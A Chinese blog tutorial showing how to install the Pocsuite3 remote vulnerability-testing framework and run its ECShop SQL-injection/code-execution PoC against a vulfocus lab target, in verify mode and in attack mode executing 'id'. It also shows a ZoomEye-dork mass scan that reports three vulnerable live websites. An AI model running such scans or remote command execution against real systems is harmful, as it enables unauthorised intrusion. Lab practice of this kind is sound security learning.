Pocsuite安装和简单使用(以vulfocus靶场测试)

最新推荐文章于 2024-09-24 07:53:44 发布
最新推荐文章于 2024-09-24 07:53:44 发布
阅读量1.9k 收藏 4
点赞数 1
分类专栏: python 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45813980/article/details/122159393
版权

介绍

Pocsuite 是由知道创宇404实验室打造的一款开源的远程漏洞测试框架。它是知道创宇安全研究团队发展的基石,是团队发展至今一直维护的一个项目,保障了我们的 Web 安全研究能力的领先。

你可以直接使用 Pocsuite 进行漏洞的验证与利用;你也可以基于 Pocsuite 进行 PoC/Exp 的开发,因为它也是一个 PoC 开发框架;同时,你还可以在你的漏洞测试工具里直接集成 Pocsuite,它也提供标准的调用类。

安装

github下载链接:
https://github.com/knownsec/pocsuite3/archive/master.zip

下载后解压即可

简单使用

使用vulfocus靶场进行测试,以ecshop 2.x/3.x SQL注入/代码执行 为例:
在这里插入图片描述
进入指定目录
在这里插入图片描述
进入cmd
在这里插入图片描述
使用命令检测靶场是否存在该漏洞

python cli.py -r pocs/ecshop_rce.py -u “http://vulfocus.fofa.so:10226/” --verify

成功检测出目标存在该漏洞
在这里插入图片描述
使用攻击模式,执行命令id

python cli.py -r pocs/ecshop_rce.py -u “http://vulfocus.fofa.so:55647/” --attack --command ‘id’

命令执行成功
在这里插入图片描述
一个批量扫描漏洞的例子:
将使用ZoomEye搜索ecshop并使用 ecshop_rce.py 探测,指定线程数量为5

python cli.py -r pocs/ecshop_rce.py --dork ecshop --threads 5

扫出来了三个网站存在该漏洞

在这里插入图片描述

总结

以上是对Pocsuite的安装和简单使用,关于shell交互模式没有测试成功,以后再试
在这里插入图片描述
学习Pocsuite的使用主要是为了学习对poc的编写,正在对该脚本进行分析,希望早日熟悉Pocsuite脚本的编写。

00勇士王子
关注
专栏目录
apache log4j2vulfocus靶场漏洞复现
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-21 1352
Apache Log4j2被曝出一个高危漏洞,攻击者通过jndi注入攻击的形式可以轻松远程执行任何代码。apache log4j2vulfocus靶场漏洞复现,随后官方紧急推出了2.15.0和2.15.0-rc1新版本修复,依然未能完全解决问题,现在已经更新到2.15.0-rc2(近日已推出2.16版本)。该漏洞被命名为Log4Shell,编号CVE-2021-44228 一、环境搭建-vulfocus靶场,本次漏洞复现采用vulfocus的log4j2靶场docker,使用Kali系统进行复现实验。
网安靶场系列:手把手教你如何搭建vulfocus靶场
weixin_54626591的博客
03-14 330
手把手教你如何搭建vulfocus靶场
pocsuite3-goby:pocsuite3 goby插件
03-06
pocsuite3-goby:远程扩展测试框架 0x01部署pocsuite3 还请按照本文档的方式来部署pocsuite3,避免出现额外的环境问题 # 直接使用pip安装 pip3 install pocsuite3 # 随后可以使用pip命令查看包的安装位置来放置插件 pip show pocsuite3 # poc批量检测使用的是如下命令 # 加载poc目录下所有poc,并将结果保存为html pocsuite -u http://example.com --plugins poc_from_pocs,html_report PS: # kali linux 上面安装 pocsuite3 sudo apt update && sudo apt install python3-pip sudo su # 切换进入root权限 pip install pocsuite3 插件目前在m
ubuntu 安装pocsuite
weixin_34100227的博客
11-12 400
1生成ssh rsa 在终端输入。 ssh-keygen-t rsa -C "forwhat.cn"//注意。forwhat.cn为用户名 如果执行成功。返回 Generatingpublic/private rsa key pair. Enter file in which to save the key (/home/forwhat.c...
pocassist 开源漏洞测试框架使用教程
最新发布
gitblog_00877的博客
09-24 366
pocassist 开源漏洞测试框架使用教程 pocassist 傻瓜式漏洞PoC测试框架 项目地址: https://gitcode.com/gh_mirrors/po/pocassist ...
pocsuite3安装教程
weixin_44811844的博客
04-12 2989
pocsuite3安装教程
pocsuite使用教程
qq_41048303的博客
04-16 1567
Pocsuite使用教程 1.常用命令 # Verify验证模式 python cli.py -r pocs/test1.py(poc脚本路径) -u http://127.0.0.1 --verify # 批量验证 python cli.py -r pocs/test1.py -f url.txt --verify # 加载文件夹下所有的poc对目标进行测试 python cli.py -r pocs/* -u http://127.0.0.1 --verify # 使用多线程 python cl
pocsuite傻瓜式写Poc
qq_51796436的博客
03-02 4209
文章目录pocsuite安装使用自带sql脚本分析利用pocsuite编写xss poc实例 pocsuite安装使用 pocsuite:一款基于漏洞与poc的远程漏洞验证框架 安装:pip3 install -U pocsuite3 --no-cache-dir pocsuite - h检验安装结果 环境:python3.4以上 安装好之后会多出一个命令 pocsuite 在python目录下的_pocsuite_1_1.py就是poc编写的模板,之后要写poc直接复制这个脚本,在里面把参数改一下
Docker简单搭建Vulfocus靶场 CN-SEC 中文网.pdf
02-07
"Docker简单搭建Vulfocus靶场" Docker是一个流行的容器化平台,能够轻松地搭建和管理各种应用程序。Vulfocus是一个基于Docker的靶场平台,提供了大量的漏洞靶场环境,方便安全研究人员和渗透测试人员进行漏洞研究和...
通过vulfocus靶场--复现log4j2漏洞
weixin_55843787的博客
05-11 3546
vulfocus靶场、log4j2漏洞复现
pocassist:全新的开源漏洞测试框架,实现poc在线编辑、运行、批量测试使用文档:
08-04
pocassist是一个 Golang 编写的全新开源漏洞测试框架。 简单易用 只需要在前端编辑,即可生成poc对批量目标进行测试 单二进制文件,无依赖,也无需安装 性能优秀 支持高并发,多重并发控制,通过使用 ants实例化协程池,复用 goroutine 多重内存复用,尽可能小的内存占用 规则体系 完全兼容xray,但又不仅仅是xray。除了支持定义目录级漏洞poc,还支持服务器级漏洞、参数级漏洞、url级漏洞以及对页面内容检测,如果以上还不满足你的需求,还支持加载自定义脚本。 使用之前务必先阅读使用文档! :house: :down_arrow: 快速开始 像数 1, 2, 3 一样容易 # 启动服务 ./pocassist # 浏览器访问 http://127.0.0.1:1231 建议使用作为漏洞库。:down_arrow:,并在config.yaml 的sqlite项配置路径。 有想一块维护poc的师傅也可直接向该项目提PR。
pocsuite3pocsuite3是由Knownsec 404团队开发的开源远程漏洞测试框架
02-05
pocsuite3 法律免责声明 未经事先双方同意,使用Pocsuite攻击目标是非法的。 pocsuite仅用于安全测试 法律免责声明 事先事先双方同意,使用pocsuite攻击目标是非法的。 pocsuite仅用于安全测试目的 总览 pocsuite3是由开发的开源远程漏洞测试和概念验证开发框架。 它带有强大的概念验证引擎,以及针对最终渗透测试人员和安全研究人员的许多强大功能。 产品特点 PoC脚本可以以不同的方式在attack , verify , shell模式下运行 插件生态系统 从任何位置(本地文件,redis,数据库,Seebug ...)动态加载PoC脚本 从任何位置(CIDR
some_pocsuite:用于漏洞排查的pocsuite3验证POC代码
05-23
some_pocsuite 用于企业内部进行漏洞排查与验证的的pocsuite3验证POC代码(pocsuite3是知道创宇安全团队的开源漏洞测试框架)。 由于原Pocsuite已停止更新,因此将原来的POC代码全部重新改写并迁移到pocsuite3,原POC备份在PocsuiteV2中。 插件代码编写 使用pocsuite3 漏洞测试框架,插件编写请参考 pocsuite3 项目插件编写要求。 序号 poc 说明 1 hikvision-2013-4976_web_login-bypass.py 海康威视cve-2013-4976匿名登录验证绕过 2 weblogic-vul-check_all_rce.py weblogic反序列化漏洞(CVE-2016-0638,CVE-2016-3510,CVE-2017-3248,CVE-2018-2628,CVE-2018-2893, CVE-
pocassist一款全新的开源在线poc测试框架.md
南迪叶先森
07-07 1573
公粽号:黒掌 一个专注于分享网络安全、黑客圈热点、黑客工具技术区博主! 前言 pocassist 是一个 Go (Golang) 编写的全新的开源漏洞测试框架,实现对poc的在线编辑、管理、测试。 如果你不想撸代码,又想实现poc的逻辑,又想在线对靶机快速测试,那就使用pocassist吧。 0x01 特性 规则体系 pocassist借鉴了xray优秀的规则体系。通过基于CEL表达式定义poc规则。 完全兼容xray现有规则。 不仅仅是xray。pocassist除了支持定义目录级漏洞poc,还支持.
探索网络安全的新里程:Pocsuite 框架
gitblog_00069的博客
05-12 401
探索网络安全的新里程:Pocsuite 框架 去发现同类优质开源项目:https://gitcode.com/ Pocsuite 是一个由知名安全团队 Knownsec 404 团队倾力打造的开放源代码漏洞测试和 PoC(Proof-of-Concept)开发框架。它的存在是为了让渗透测试者和安全研究人员的工作更加高效,功能强大且独具特色。 项目介绍 作为一款综合性的工具,Pocsuite 不仅仅...
网络安全工具pocsuite使用教程
SHELLCODE_8BIT的博客
10-18 1245
使用pocsuite -h 获得支持的命令如下所示。会显示如下内容,可以看到自定义poc目录为。
POC框架——PocSuite3安装与POC开发指南
Fly_鹏程万里
08-06 3496
PocSuite3简介 Pocsuite 是由知道创宇404实验室打造的一款开源的远程漏洞测试框架。它是知道创宇安全研究团队发展的基石,是团队发展至今一直维护的一个项目,保障了Knownsec在Web 安全研究能力的领先。 用户可以直接使用 Pocsuite 进行漏洞的验证与利用;也可以基于 Pocsuite 进行 PoC/Exp 的开发,因为它也是一个 PoC 开发框架;同时,还可以在你的...
vulfocus靶场
07-28
vulfocus靶场是一个漏洞集成平台,可以通过在服务器中安装docker来使用。你可以使用以下命令将vulfocus镜像拉取到本地:docker pull vulfocus/vulfocus:latest。搭建vulfocus靶场可以按需搭建在本地或自己的服务器上,它提供了场景编排功能,可以用于内网突破训练和多重内网的穿透等用途。如果你想在本地搭建vulfocus靶场,可以按照以下步骤进行操作: 1. 创建一个目录并进入该目录,例如:mkdir VF靶场 && cd VF靶场。 2. 使用git命令克隆vulfocus仓库:git clone https://github.com/fofapro/vulfocus.git web。 3. 配置环境参数,将你的CentOS服务器的IP地址填入配置文件中。你可以使用ifconfig命令查看你的IP地址。 这样,你就可以搭建vulfocus靶场并开始使用了。 #### 引用[.reference_title] - *1* *2* [【靶场vulfocus搭建和场景编排](https://blog.csdn.net/qq_39583774/article/details/130917089)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [vulfocus靶场的搭建](https://blog.csdn.net/qq_68890680/article/details/131351918)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值